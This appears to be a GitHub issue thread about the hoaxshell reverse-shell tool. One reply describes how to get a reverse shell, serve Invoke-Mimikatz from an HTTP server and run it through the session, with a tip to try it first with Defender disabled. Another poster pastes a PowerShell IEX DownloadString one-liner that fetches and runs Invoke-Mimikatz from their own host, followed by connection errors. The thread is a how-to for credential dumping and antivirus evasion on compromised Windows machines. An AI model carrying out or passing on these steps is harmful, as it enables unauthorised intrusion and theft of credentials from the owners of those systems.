t3l3machus
commented
2 years ago Here's how it's done:
-
Start hoaxshell and get a reverse shell.
-
Start a python http server on the directory you have saved mimikatz:
-
Execute invoke mimikatz web request through the hoaxshell session:
You should first try this with defender disabled because there's a very high chance mimikatz will get caught.
PS C:\Users\Administrsator>powershell IEX(New-Object Net.WebClient).DownloadString('https://MyIP/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"' - NOT Working. Error below. its either port 443 or 4443 its not working. I downloaded mimikatz ps1 file same folder as hoaxshell.py folder.
Payload is using SSL.
Note: I replaced my ip with "myip" to hide my ip.
Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server" At line:1 char:1
Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:108